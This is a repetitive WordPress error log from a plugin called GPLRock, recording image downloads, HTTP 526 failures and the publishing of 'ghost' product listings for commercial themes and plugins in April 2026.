/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-51f94579.jpg [04-Apr-2026 23:19:07 UTC] GPLRock: Using pre-downloaded image for product bluehope-whale-marine-conservation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-51f94579.jpg [04-Apr-2026 23:19:07 UTC] GPLRock: Ghost product published with image - Product ID: bluehope-whale-marine-conservation-elementor-template-kit [04-Apr-2026 23:19:09 UTC] GPLRock: Image downloaded successfully for product archerbooks-author-ebook-resume-elementor-pro-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5733d8db.jpg [04-Apr-2026 23:19:09 UTC] GPLRock: Using pre-downloaded image for product archerbooks-author-ebook-resume-elementor-pro-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5733d8db.jpg [04-Apr-2026 23:19:09 UTC] GPLRock: Ghost product published with image - Product ID: archerbooks-author-ebook-resume-elementor-pro-template-kit [04-Apr-2026 23:19:12 UTC] GPLRock: Image downloaded successfully for product adverza-digital-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f3e321f.png [04-Apr-2026 23:19:12 UTC] GPLRock: Using pre-downloaded image for product adverza-digital-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f3e321f.png [04-Apr-2026 23:19:12 UTC] GPLRock: Ghost product published with image - Product ID: adverza-digital-marketing-agency-elementor-template-kit [04-Apr-2026 23:19:14 UTC] GPLRock: Image downloaded successfully for product versilo-vpn-service-proxy-security-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0496024.png [04-Apr-2026 23:19:14 UTC] GPLRock: Using pre-downloaded image for product versilo-vpn-service-proxy-security-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0496024.png [04-Apr-2026 23:19:14 UTC] GPLRock: Ghost product published with image - Product ID: versilo-vpn-service-proxy-security-elementor-template-kit [04-Apr-2026 23:19:16 UTC] GPLRock: Image downloaded successfully for product visography-photography-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-13b72a55.jpg [04-Apr-2026 23:19:16 UTC] GPLRock: Using pre-downloaded image for product visography-photography-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-13b72a55.jpg [04-Apr-2026 23:19:16 UTC] GPLRock: Ghost product published with image - Product ID: visography-photography-portfolio-elementor-template-kit [04-Apr-2026 23:19:17 UTC] GPLRock: Image downloaded successfully for product wayune-beauty-care-product-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8637b7ab.jpg [04-Apr-2026 23:19:18 UTC] GPLRock: Using pre-downloaded image for product wayune-beauty-care-product-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8637b7ab.jpg [04-Apr-2026 23:19:18 UTC] GPLRock: Ghost product published with image - Product ID: wayune-beauty-care-product-elementor-template-kit [04-Apr-2026 23:20:51 UTC] GPLRock: Image download failed for product nutritist-healthy-food-nutrition-coach-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:20:53 UTC] GPLRock: Image download failed for product nutritist-healthy-food-nutrition-coach-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:20:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nutritist--healthy-food--nutrition-coach-fse-wordpress-theme-6236.webp for product nutritist-healthy-food-nutrition-coach-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:20:55 UTC] GPLRock: Image download failed for product nutritist-healthy-food-nutrition-coach-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:20:57 UTC] GPLRock: Image download failed for product nutritist-healthy-food-nutrition-coach-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:20:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nutritist--healthy-food--nutrition-coach-fse-wordpress-theme-6236.webp for product nutritist-healthy-food-nutrition-coach-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:20:59 UTC] GPLRock WARNING: Image download failed for product nutritist-healthy-food-nutrition-coach-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nutritist--healthy-food--nutrition-coach-fse-wordpress-theme-6236.webp [04-Apr-2026 23:20:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nutritist-healthy-food-nutrition-coach-fse-wordpress-theme [04-Apr-2026 23:20:59 UTC] GPLRock: Image download failed for product revaldak-printing-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:21:01 UTC] GPLRock: Image download failed for product revaldak-printing-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:21:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revaldak---printing-services-wordpress-theme-13882.webp for product revaldak-printing-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:21:04 UTC] GPLRock: Image download failed for product revaldak-printing-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:21:06 UTC] GPLRock: Image download failed for product revaldak-printing-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:21:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revaldak---printing-services-wordpress-theme-13882.webp for product revaldak-printing-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:21:08 UTC] GPLRock WARNING: Image download failed for product revaldak-printing-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/revaldak---printing-services-wordpress-theme-13882.webp [04-Apr-2026 23:21:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: revaldak-printing-services-wordpress-theme [04-Apr-2026 23:21:08 UTC] GPLRock: Image download failed for product beautyspot-beauty-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:21:11 UTC] GPLRock: Image download failed for product beautyspot-beauty-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:30:59 UTC] GPLRock: Image downloaded successfully for product studiopress-parallax-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f9998a9.jpg [04-Apr-2026 23:30:59 UTC] GPLRock: Using pre-downloaded image for product studiopress-parallax-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f9998a9.jpg [04-Apr-2026 23:30:59 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-parallax-pro-genesis-wordpress-theme [04-Apr-2026 23:31:01 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-custom-google-search (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9cd8ce23.jpg [04-Apr-2026 23:31:01 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-custom-google-search: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9cd8ce23.jpg [04-Apr-2026 23:31:01 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-custom-google-search [04-Apr-2026 23:31:02 UTC] GPLRock: Image downloaded successfully for product woocommerce-bulk-stock-management (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f35f7945.jpg [04-Apr-2026 23:31:02 UTC] GPLRock: Using pre-downloaded image for product woocommerce-bulk-stock-management: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f35f7945.jpg [04-Apr-2026 23:31:02 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-bulk-stock-management [04-Apr-2026 23:31:04 UTC] GPLRock: Image downloaded successfully for product medical-dentist-medical-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c81be3d0.jpg [04-Apr-2026 23:31:04 UTC] GPLRock: Using pre-downloaded image for product medical-dentist-medical-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c81be3d0.jpg [04-Apr-2026 23:31:04 UTC] GPLRock: Ghost product published with image - Product ID: medical-dentist-medical-wordpress [04-Apr-2026 23:31:06 UTC] GPLRock: Image downloaded successfully for product popup-maker-secure-idle-user-logout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9001094d.jpg [04-Apr-2026 23:31:06 UTC] GPLRock: Using pre-downloaded image for product popup-maker-secure-idle-user-logout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9001094d.jpg [04-Apr-2026 23:31:06 UTC] GPLRock: Ghost product published with image - Product ID: popup-maker-secure-idle-user-logout [04-Apr-2026 23:31:07 UTC] GPLRock: Image downloaded successfully for product offer-your-price (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-14b009b0.jpg [04-Apr-2026 23:31:07 UTC] GPLRock: Using pre-downloaded image for product offer-your-price: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-14b009b0.jpg [04-Apr-2026 23:31:07 UTC] GPLRock: Ghost product published with image - Product ID: offer-your-price [04-Apr-2026 23:31:09 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wildfire-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80f43f5f.jpg [04-Apr-2026 23:31:09 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wildfire-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80f43f5f.jpg [04-Apr-2026 23:31:09 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wildfire-wordpress-theme [04-Apr-2026 23:31:11 UTC] GPLRock: Image downloaded successfully for product ithemes-sales-accelerator-multichannel (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fbbcc12c.jpg [04-Apr-2026 23:31:11 UTC] GPLRock: Using pre-downloaded image for product ithemes-sales-accelerator-multichannel: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fbbcc12c.jpg [04-Apr-2026 23:31:11 UTC] GPLRock: Ghost product published with image - Product ID: ithemes-sales-accelerator-multichannel [04-Apr-2026 23:31:13 UTC] GPLRock: Image downloaded successfully for product studiopress-maker-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b7236bc.jpg [04-Apr-2026 23:31:13 UTC] GPLRock: Using pre-downloaded image for product studiopress-maker-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9b7236bc.jpg [04-Apr-2026 23:31:13 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-maker-pro-genesis-wordpress-theme [04-Apr-2026 23:31:14 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-locations (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-80b510e6.jpg [04-Apr-2026 23:31:14 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-locations: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-80b510e6.jpg [04-Apr-2026 23:31:14 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-locations [04-Apr-2026 23:32:32 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81449377.jpg [04-Apr-2026 23:32:32 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-81449377.jpg [04-Apr-2026 23:32:32 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets [04-Apr-2026 23:32:34 UTC] GPLRock: Image downloaded successfully for product searchwp-bbpress-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cb0ae6a.jpg [04-Apr-2026 23:32:34 UTC] GPLRock: Using pre-downloaded image for product searchwp-bbpress-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cb0ae6a.jpg [04-Apr-2026 23:32:34 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-bbpress-integration [04-Apr-2026 23:32:35 UTC] GPLRock: Image downloaded successfully for product soliloquy-dynamic-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bc8ff1b2.jpg [04-Apr-2026 23:32:35 UTC] GPLRock: Using pre-downloaded image for product soliloquy-dynamic-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bc8ff1b2.jpg [04-Apr-2026 23:32:35 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-dynamic-addon [04-Apr-2026 23:32:36 UTC] GPLRock: Image downloaded successfully for product yith-paypal-braintree-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0ba706f2.jpg [04-Apr-2026 23:32:37 UTC] GPLRock: Using pre-downloaded image for product yith-paypal-braintree-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0ba706f2.jpg [04-Apr-2026 23:32:37 UTC] GPLRock: Ghost product published with image - Product ID: yith-paypal-braintree-for-woocommerce [04-Apr-2026 23:32:39 UTC] GPLRock: Image downloaded successfully for product mythemeshop-chronology-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25f13937.jpg [04-Apr-2026 23:32:39 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-chronology-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25f13937.jpg [04-Apr-2026 23:32:39 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-chronology-wordpress-theme [04-Apr-2026 23:32:40 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wp-shortcode-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6e9cfe4a.jpg [04-Apr-2026 23:32:40 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wp-shortcode-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6e9cfe4a.jpg [04-Apr-2026 23:32:40 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wp-shortcode-pro [04-Apr-2026 23:32:42 UTC] GPLRock: Image downloaded successfully for product monsterinsights-dimensions-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f6424cf.jpg [04-Apr-2026 23:32:42 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-dimensions-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5f6424cf.jpg [04-Apr-2026 23:32:42 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-dimensions-addon [04-Apr-2026 23:32:43 UTC] GPLRock: Image downloaded successfully for product ninjateam-facebook-messenger-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-88ea707c.jpg [04-Apr-2026 23:32:43 UTC] GPLRock: Using pre-downloaded image for product ninjateam-facebook-messenger-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-88ea707c.jpg [04-Apr-2026 23:32:43 UTC] GPLRock: Ghost product published with image - Product ID: ninjateam-facebook-messenger-for-wordpress [04-Apr-2026 23:32:45 UTC] GPLRock: Image downloaded successfully for product facebook-chat-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a7ed4de.jpg [04-Apr-2026 23:32:45 UTC] GPLRock: Using pre-downloaded image for product facebook-chat-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7a7ed4de.jpg [04-Apr-2026 23:32:45 UTC] GPLRock: Ghost product published with image - Product ID: facebook-chat-for-wordpress [04-Apr-2026 23:32:47 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-wc-paid-listings-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d50be4b7.jpg [04-Apr-2026 23:32:47 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-wc-paid-listings-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d50be4b7.jpg [04-Apr-2026 23:32:47 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-wc-paid-listings-addon [04-Apr-2026 23:35:19 UTC] GPLRock: Image download failed for product infixedu-school-school-management-system-software (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:21 UTC] GPLRock: Image download failed for product infixedu-school-school-management-system-software (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infixedu-school---school-management-system-software-14710.webp for product infixedu-school-school-management-system-software after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:23 UTC] GPLRock: Image download failed for product infixedu-school-school-management-system-software (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:26 UTC] GPLRock: Image download failed for product infixedu-school-school-management-system-software (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infixedu-school---school-management-system-software-14710.webp for product infixedu-school-school-management-system-software after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:28 UTC] GPLRock WARNING: Image download failed for product infixedu-school-school-management-system-software. URL: https://meldwp.com/wp-content/uploads/infixedu-school---school-management-system-software-14710.webp [04-Apr-2026 23:35:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infixedu-school-school-management-system-software [04-Apr-2026 23:35:28 UTC] GPLRock: Image download failed for product woocommerce-order-builder-combo-products-extra-options (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:30 UTC] GPLRock: Image download failed for product woocommerce-order-builder-combo-products-extra-options (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-order-builder--combo-products--extra-options-31911.webp for product woocommerce-order-builder-combo-products-extra-options after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:32 UTC] GPLRock: Image download failed for product woocommerce-order-builder-combo-products-extra-options (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:34 UTC] GPLRock: Image download failed for product woocommerce-order-builder-combo-products-extra-options (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-order-builder--combo-products--extra-options-31911.webp for product woocommerce-order-builder-combo-products-extra-options after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:36 UTC] GPLRock WARNING: Image download failed for product woocommerce-order-builder-combo-products-extra-options. URL: https://meldwp.com/wp-content/uploads/woocommerce-order-builder--combo-products--extra-options-31911.webp [04-Apr-2026 23:35:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-order-builder-combo-products-extra-options [04-Apr-2026 23:35:36 UTC] GPLRock: Image download failed for product vidi-video-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:39 UTC] GPLRock: Image download failed for product vidi-video-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vidi---video-wordpress-plugin-30757.webp for product vidi-video-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:41 UTC] GPLRock: Image download failed for product vidi-video-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:43 UTC] GPLRock: Image download failed for product vidi-video-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vidi---video-wordpress-plugin-30757.webp for product vidi-video-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:45 UTC] GPLRock WARNING: Image download failed for product vidi-video-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/vidi---video-wordpress-plugin-30757.webp [04-Apr-2026 23:35:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vidi-video-wordpress-plugin [04-Apr-2026 23:35:45 UTC] GPLRock: Image download failed for product premium-url-shortener-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:47 UTC] GPLRock: Image download failed for product premium-url-shortener-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-url-shortener-wordpress-plugin-15786.webp for product premium-url-shortener-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:50 UTC] GPLRock: Image download failed for product premium-url-shortener-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:52 UTC] GPLRock: Image download failed for product premium-url-shortener-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/premium-url-shortener-wordpress-plugin-15786.webp for product premium-url-shortener-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:54 UTC] GPLRock WARNING: Image download failed for product premium-url-shortener-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/premium-url-shortener-wordpress-plugin-15786.webp [04-Apr-2026 23:35:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: premium-url-shortener-wordpress-plugin [04-Apr-2026 23:35:54 UTC] GPLRock: Image download failed for product interactive-us-map-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:56 UTC] GPLRock: Image download failed for product interactive-us-map-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:35:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interactive-us-map---wordpress-plugin-24829.webp for product interactive-us-map-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:35:58 UTC] GPLRock: Image download failed for product interactive-us-map-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:00 UTC] GPLRock: Image download failed for product interactive-us-map-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interactive-us-map---wordpress-plugin-24829.webp for product interactive-us-map-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:36:02 UTC] GPLRock WARNING: Image download failed for product interactive-us-map-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/interactive-us-map---wordpress-plugin-24829.webp [04-Apr-2026 23:36:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: interactive-us-map-wordpress-plugin [04-Apr-2026 23:36:03 UTC] GPLRock: Image download failed for product wordpress-cloud-manager-dropbox-google-drive-s3-folder-sharing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:06 UTC] GPLRock: Image download failed for product wordpress-cloud-manager-dropbox-google-drive-s3-folder-sharing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-cloud-manager--dropbox---google-drive---s3-folder-sharing-29764.webp for product wordpress-cloud-manager-dropbox-google-drive-s3-folder-sharing after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:36:08 UTC] GPLRock: Image download failed for product wordpress-cloud-manager-dropbox-google-drive-s3-folder-sharing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:10 UTC] GPLRock: Image download failed for product wordpress-cloud-manager-dropbox-google-drive-s3-folder-sharing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-cloud-manager--dropbox---google-drive---s3-folder-sharing-29764.webp for product wordpress-cloud-manager-dropbox-google-drive-s3-folder-sharing after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:36:12 UTC] GPLRock WARNING: Image download failed for product wordpress-cloud-manager-dropbox-google-drive-s3-folder-sharing. URL: https://meldwp.com/wp-content/uploads/wordpress-cloud-manager--dropbox---google-drive---s3-folder-sharing-29764.webp [04-Apr-2026 23:36:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-cloud-manager-dropbox-google-drive-s3-folder-sharing [04-Apr-2026 23:36:12 UTC] GPLRock: Image download failed for product woocommerce-offline-credit-card-payment-method (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:14 UTC] GPLRock: Image download failed for product woocommerce-offline-credit-card-payment-method (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-offline-credit-card-payment-method-26160.webp for product woocommerce-offline-credit-card-payment-method after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:36:16 UTC] GPLRock: Image download failed for product woocommerce-offline-credit-card-payment-method (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:19 UTC] GPLRock: Image download failed for product woocommerce-offline-credit-card-payment-method (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-offline-credit-card-payment-method-26160.webp for product woocommerce-offline-credit-card-payment-method after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:36:21 UTC] GPLRock WARNING: Image download failed for product woocommerce-offline-credit-card-payment-method. URL: https://meldwp.com/wp-content/uploads/woocommerce-offline-credit-card-payment-method-26160.webp [04-Apr-2026 23:36:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-offline-credit-card-payment-method [04-Apr-2026 23:36:21 UTC] GPLRock: Image downloaded successfully for product revy-wordpress-booking-system-for-repair-service-industries (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d65dee6.webp [04-Apr-2026 23:36:21 UTC] GPLRock: Using pre-downloaded image for product revy-wordpress-booking-system-for-repair-service-industries: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5d65dee6.webp [04-Apr-2026 23:36:21 UTC] GPLRock: Ghost product published with image - Product ID: revy-wordpress-booking-system-for-repair-service-industries [04-Apr-2026 23:36:21 UTC] GPLRock: Image downloaded successfully for product image-video-audio-background-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a20d5ffc.webp [04-Apr-2026 23:36:21 UTC] GPLRock: Using pre-downloaded image for product image-video-audio-background-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a20d5ffc.webp [04-Apr-2026 23:36:21 UTC] GPLRock: Ghost product published with image - Product ID: image-video-audio-background-for-wordpress [04-Apr-2026 23:36:21 UTC] GPLRock: Image download failed for product apply-wordpress-admin-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:23 UTC] GPLRock: Image download failed for product apply-wordpress-admin-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 23:36:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apply---wordpress-admin-theme-3022.webp for product apply-wordpress-admin-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 23:36:25 UTC] GPLRock: Image download failed for product apply-wordpress-admin-theme 